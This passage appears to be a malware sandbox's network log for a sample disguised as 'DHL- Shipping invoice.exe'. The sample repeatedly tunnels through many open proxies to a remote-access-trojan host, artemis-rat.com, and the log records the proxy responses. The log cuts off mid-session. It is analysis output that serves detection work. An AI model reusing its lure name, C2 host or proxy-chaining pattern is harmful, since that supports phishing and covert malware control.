                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1447192.168.2.454209103.118.46.6180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.365451097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1448192.168.2.45368247.56.110.20489896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.366084099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1449192.168.2.45201585.62.218.25031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.376430988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.553863049 CET1254INHTTP/1.1 403 Forbidden
                            Server: squid/3.5.28
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 952
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            Content-Language: en
                            X-Cache: MISS from ah_test
                            Via: 1.1 ah_test (squid/3.5.28)
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 54 75 65 2c 20 31 32 20 4d 61 72 20 32 30 32 34 20 30 37 3a 33 37 3a 30 35 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Tue, 12 Mar 2024 07:37:05 GMT</p></div></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1450192.168.2.45425747.106.112.20780816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.408051968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.735960007 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1451192.168.2.454303211.222.252.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.412940025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1452192.168.2.452713102.0.3.22280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.413037062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453294992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562766075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.562699080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1453192.168.2.454408162.241.53.72573646484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.413527012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.843607903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250313997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.009052038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453501940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932604074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453279972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250379086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1454192.168.2.454254103.127.1.130806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.414295912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1455192.168.2.454304211.222.252.18781976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.414413929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1456192.168.2.454349176.197.219.7410806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.419585943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1457192.168.2.449736161.97.173.4253796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.488796949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563033104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562946081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.562695026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.562336922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.562289953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:41.564924002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1458192.168.2.45443638.162.27.9831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.489372015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.793859005 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1459192.168.2.453597192.252.220.8941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.489670038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1460192.168.2.45444838.162.7.22331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.489770889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.807678938 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1461192.168.2.45376345.120.178.19710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.490406990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1462192.168.2.45402091.107.180.250806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.490808964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1463192.168.2.454274103.13.229.19331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.490833044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250036955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.632576942 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1464192.168.2.45372691.233.111.4910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.490950108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563062906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562948942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.258955956 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1465192.168.2.454473172.67.182.22806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.491018057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
